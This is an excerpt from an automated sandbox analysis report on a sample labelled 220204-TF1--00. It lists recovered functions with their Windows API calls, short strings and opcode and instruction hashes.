                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 658075937c9c976d8871054ad5390897ba666f8fae572a3b9dde280571e017bf
                    • Instruction ID: 04cbb54bcb7ba5294826ae99fdec93784d16fb486ce85b6a4ac215a7a3aca031
                    • Opcode Fuzzy Hash: 658075937c9c976d8871054ad5390897ba666f8fae572a3b9dde280571e017bf
                    • Instruction Fuzzy Hash: 12E0E575800604EFCB61AFA0C80869D7BB2EB4C310F10C129F95A97620CF7991419F54
                    Function 006863A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID: %q
                    • API String ID: 0-734004689
                    • Opcode ID: fbf7196e6864ff4011ac9bff105e6b9c278b77db0e926092cbe60bd616770437
                    • Instruction ID: d0b2aa99339e2c6db89789f1b18686cc00ed000cfbff7f35f033fe924d31f51f
                    • Opcode Fuzzy Hash: fbf7196e6864ff4011ac9bff105e6b9c278b77db0e926092cbe60bd616770437
                    • Instruction Fuzzy Hash: 5AB1A1B19001099BCF14FF98C4819EEB7B7FF44310F50422AF906A7295EB309E86CB66
                    Function 006FB1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __itow_s
                    • String ID: xrt$xrt
                    • API String ID: 3653519197-931136551
                    • Opcode ID: fd7122c66c44763bebb3cf537b431afa94b8f7f2652b38e31d531b62c303e56c
                    • Instruction ID: c38c35480061fc568f18d81d3efbe9db7ea1f2895582e3903cf959069a0c3ee5
                    • Opcode Fuzzy Hash: fd7122c66c44763bebb3cf537b431afa94b8f7f2652b38e31d531b62c303e56c
                    • Instruction Fuzzy Hash: 19B18F70A00209AFCB14EF54C891EFEB7BAFF58300F149559FA459B292DB74EA41CB64
                    Function 006EB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • __wcsnicmp.LIBCMT ref: 006EB298
                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006EB361
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                    • String ID: LPT
                    • API String ID: 3222508074-1350329615
                    • Opcode ID: e8ef0a8fa79ea7ec250eb5d94fed009935ca8372252569c0e6ed822f3897f798
                    • Instruction ID: fac4408261a314dd2a9240ec22b0928f65e2bff52df2b69ef0d95c42f9701b42
                    • Opcode Fuzzy Hash: e8ef0a8fa79ea7ec250eb5d94fed009935ca8372252569c0e6ed822f3897f798
                    • Instruction Fuzzy Hash: CF617E75A00215AFCF14EB95C882EAEB7B6AF08310F15416AF546AB391DB70AE41CB94
                    Function 006C8A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: Oai
                    • API String ID: 4104443479-3423572213
                    • Opcode ID: 52f99d1444f332514e0d523a1ede93879d121f68d0ad6bde3fe81900e69ab2ec
                    • Instruction ID: f9e527100488f8ad46df7c60f126affe31e900b910353dcb5495514f9ca0a07d
                    • Opcode Fuzzy Hash: 52f99d1444f332514e0d523a1ede93879d121f68d0ad6bde3fe81900e69ab2ec
                    • Instruction Fuzzy Hash: 7D512C70A006099FCF64CFA8C480ABEBBB6FF45314F14852EE85AD7350EB31A956CB51
                    Function 00692AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 00692AC8
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00692AE1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: c3f7188f894f09d5695d421e4ce42bf8e9a487a4b046dde8c48a61aeca863d09
                    • Instruction ID: 3a052affef5640c8ba323f617d05538b0645cf69edbeb5f610f99e94fd92c0dc
                    • Opcode Fuzzy Hash: c3f7188f894f09d5695d421e4ce42bf8e9a487a4b046dde8c48a61aeca863d09
                    • Instruction Fuzzy Hash: C35165724187449BD360BF50D886BAFBBF8FF88314F56895CF1DA411A1DB308429CB2A
                    Function 006E99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0068506B: __fread_nolock.LIBCMT ref: 00685089
                    • _wcscmp.LIBCMT ref: 006E9AAE
                    • _wcscmp.LIBCMT ref: 006E9AC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: 1a9b17715fe6950539660e6b581acc37ab8297a01785ac57fbdb599208600d68
                    • Instruction ID: df688eb55dc4066d1b463f00ca80cd0ac5a6a1cbf75a91a49b0b7148910fbee5
                    • Opcode Fuzzy Hash: 1a9b17715fe6950539660e6b581acc37ab8297a01785ac57fbdb599208600d68
                    • Instruction Fuzzy Hash: 6041F671A00759BADF20AAA5CC45FEFB7FEDF45710F00007DBA01E7281DA75AA448BA5
                    Function 006C099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID: Dtt$Dtt
                    • API String ID: 1473721057-4113666926
                    • Opcode ID: ed40b398894ce8c6a4de4e1273be7be587d6c4ed8ff6cf78a90277ab06de6932
                    • Instruction ID: c2fac3d9986bac2984a4143b9c9d7ddf98c6972eb7a66a9f87eb97b4a1cde163
                    • Opcode Fuzzy Hash: ed40b398894ce8c6a4de4e1273be7be587d6c4ed8ff6cf78a90277ab06de6932
                    • Instruction Fuzzy Hash: C151F778608341CFE754DF58C080A6ABBF2BB99354F548A5EF9858B321D735EC81CB82
                    Function 006F2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006F2892
                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006F28C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CrackInternet_memset
                    • String ID: |
                    • API String ID: 1413715105-2343686810
                    • Opcode ID: d0c0a32e0bec7b7d699e2edf960ac2ee5d4a630351ee4a6f6e3b0722cbd26a08
                    • Instruction ID: 2a958bf4e9252a3f955c66594d7e946dc917896f616d87c3caa696c0541cb6d1
                    • Opcode Fuzzy Hash: d0c0a32e0bec7b7d699e2edf960ac2ee5d4a630351ee4a6f6e3b0722cbd26a08
                    • Instruction Fuzzy Hash: AC313C7180411AAFCF41AFA1CC85EEEBFBAFF08300F104129F915A6265DB319956DF60
                    Function 00706CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 00706D86
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00706DC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 342f7bab0dea7ce3b62279a1eeaa4d4669e23872f49283ebfe7cdd630b7c45c0
                    • Instruction ID: 4684b6aeea12508ec1ea281d28f91b0b8965a88920268b33b6a2ee06413ae3da
                    • Opcode Fuzzy Hash: 342f7bab0dea7ce3b62279a1eeaa4d4669e23872f49283ebfe7cdd630b7c45c0
                    • Instruction Fuzzy Hash: 0B316C71210604EEEB109F64CC90BFB77E9FF48724F108619F9A6D7190DA39AC91DB64
                    Function 006E2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006E2E00
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006E2E3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 6f760b5bb478bd9fea2733c027f1efdef58b74dcc893a543c5d5358b550dca49
                    • Instruction ID: 844b24da8bbce88291468e987df9866d51cb66c037aa6d82bd6f55b2df8f40fa
                    • Opcode Fuzzy Hash: 6f760b5bb478bd9fea2733c027f1efdef58b74dcc893a543c5d5358b550dca49
                    • Instruction Fuzzy Hash: 3E31F53160135AEBEB248F4AC885BEEBBBFFF05350F14406EE985962A0E7709940CB14
                    Function 00706943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007069D0
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007069DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 0a09d90a60fe9655241d3405555a0e065579fc9df097e8d3791d515ad05959d9
                    • Instruction ID: 878e1782143af4509daaa7ef058069e309ba9060e99187fb162d52016f82702e
                    • Opcode Fuzzy Hash: 0a09d90a60fe9655241d3405555a0e065579fc9df097e8d3791d515ad05959d9
                    • Instruction Fuzzy Hash: 0211C871710208EFEF119F14CC90EBB37AEEB953A4F114329F958972D0D679AC6187A0
                    Function 00706E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00681D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00681D73
                      • Part of subcall function 00681D35: GetStockObject.GDI32(00000011), ref: 00681D87
                      • Part of subcall function 00681D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00681D91
                    • GetWindowRect.USER32(00000000,?), ref: 00706EE0
                    • GetSysColor.USER32(00000012), ref: 00706EFA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                    • String ID: static
                    • API String ID: 1983116058-2160076837
                    • Opcode ID: 819d2bc8febc57c0e88b0e0c0377017bfa8a73169c6c4f25e7916fef5f6e3808
                    • Instruction ID: 25cbe91564ffb75ebb2e6c346d81a68213e6af5b7782e4c56b424e00ec56e0d6
                    • Opcode Fuzzy Hash: 819d2bc8febc57c0e88b0e0c0377017bfa8a73169c6c4f25e7916fef5f6e3808
                    • Instruction Fuzzy Hash: 2921597261020AEFDB04DFA8CC45AFA7BF8FB08314F004629F955D3290E738E8619B50
                    Function 00706B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowTextLengthW.USER32(00000000), ref: 00706C11
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00706C20
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LengthMessageSendTextWindow
                    • String ID: edit
                    • API String ID: 2978978980-2167791130
                    • Opcode ID: d7b20f9e308988e57fb90f4bf8e70b2cb6e9c474b168e275fbaeae535f7903ee
                    • Instruction ID: 40994c78f617b4fc58b2c7fcc8575bddc85258784e7e7bfbbcd68d09f1094645
                    • Opcode Fuzzy Hash: d7b20f9e308988e57fb90f4bf8e70b2cb6e9c474b168e275fbaeae535f7903ee
                    • Instruction Fuzzy Hash: 16119DB1100208EBEB108E649C55ABB37A9EB05378F204724F961D71E0C779ECA19B60
                    Function 006E2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006E2F11
                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006E2F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 08e552ff67213cbdccbe42e3b1c0acfb410372e929001d197e711e12464dedcf
                    • Instruction ID: 1f5a4befcc78f8668e2d04b5e8cc6766ef63d296d7fbfc1d555dea83d4ca833c
                    • Opcode Fuzzy Hash: 08e552ff67213cbdccbe42e3b1c0acfb410372e929001d197e711e12464dedcf
                    • Instruction Fuzzy Hash: 561122319423A6ABCB20DB59DD14BDD73BFEB02300F0840B6E800A73A0D7B0AD06C795
                    Function 006F24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006F2520
                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006F2549
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: e77bf735a61e7ae59e1671486e5c82a272feabb489c0ec338634f5ace9e8b0df
                    • Instruction ID: 8cb6bc134b0964e0c352b329c012aa7116a2b327e650c20f665b54a86ce96f6e
                    • Opcode Fuzzy Hash: e77bf735a61e7ae59e1671486e5c82a272feabb489c0ec338634f5ace9e8b0df
                    • Instruction Fuzzy Hash: 2C11E3B010122ABADB248F51CCA5EFBFFA9FF05351F10812AF60546140D2705981DEF1
                    Function 006F80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006F830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,006F80C8,?,00000000,?,?), ref: 006F8322
                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006F80CB
                    • htons.WSOCK32(00000000,?,00000000), ref: 006F8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: eb9581f4ee9c03ed9c7a582466c2985a7ff8c9d77f97cfe056fba278853fbeb3
                    • Instruction ID: 42adc73fbad1fda5b05d27614f56abc3d99d8abae18e2f151fdc9c48ab33c3d4
                    • Opcode Fuzzy Hash: eb9581f4ee9c03ed9c7a582466c2985a7ff8c9d77f97cfe056fba278853fbeb3
                    • Instruction Fuzzy Hash: 85118275600209ABDB20EF64CC46FFDB366EF14314F10866BEA1197391DE71A8158799
                    Function 006D92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                      • Part of subcall function 006DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 006DB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006D9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 3722b70689f96af5e46b0b8b5ada1b2fed56ab7448f63f2c778aedf365cd0f08
                    • Instruction ID: 74cbed4a3a610e46a71a4818d8b1ff8cd863a5db384cb10f627b55c7e2e6c68d
                    • Opcode Fuzzy Hash: 3722b70689f96af5e46b0b8b5ada1b2fed56ab7448f63f2c778aedf365cd0f08
                    • Instruction Fuzzy Hash: 45019E71A05214ABCB18FBA4CC918FE77AABF06720B15071AFA32573D2DB3599089764
                    Function 006D91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
